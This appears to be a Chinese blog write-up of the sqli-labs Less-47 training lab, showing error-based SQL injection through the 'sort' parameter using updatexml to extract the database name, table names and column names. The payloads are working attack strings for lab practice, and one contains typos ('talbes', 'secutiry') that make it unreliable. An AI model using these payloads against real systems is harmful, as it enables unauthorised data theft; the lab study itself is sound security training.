sqli-labs-Less-47

SQLI-LAPS 实验记录

Less-47

这一关与之前的关卡类似,只是闭合的方式不同。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

结果如图所示,返回了数据库名。

后续爆出数据库的表名、列名等方式如下:

  • 爆出表名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+
  • 爆出列名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
相关推荐
数智化管理手记5 小时前
精益生产中的TPM管理是什么?一文破解设备零故障的密码
服务器·网络·数据库·低代码·制造·源代码管理·精益工程
翊谦6 小时前
Java Agent开发 Milvus 向量数据库安装
java·数据库·milvus
難釋懷6 小时前
OpenResty实现Redis查询
数据库·redis·openresty
别抢我的锅包肉7 小时前
【MySQL】第四节 - 多表查询、多表关系全解析
数据库·mysql·datagrip
Database_Cool_7 小时前
OpenClaw-Observability:基于 DuckDB 构建 OpenClaw 的全链路可观测体系
数据库·阿里云·ai
菩提小狗7 小时前
每日安全情报报告 · 2026-04-02
网络安全·漏洞·cve·安全情报·每日安全
刘~浪地球7 小时前
Redis 从入门到精通(五):哈希操作详解
数据库·redis·哈希算法
XLYcmy8 小时前
一个针对医疗RAG系统的数据窃取攻击工具
python·网络安全·ai·llm·agent·rag·ai安全
zzh0818 小时前
MySQL高可用集群笔记
数据库·笔记·mysql
汤愈韬8 小时前
网络安全概念及规范_2
网络安全·security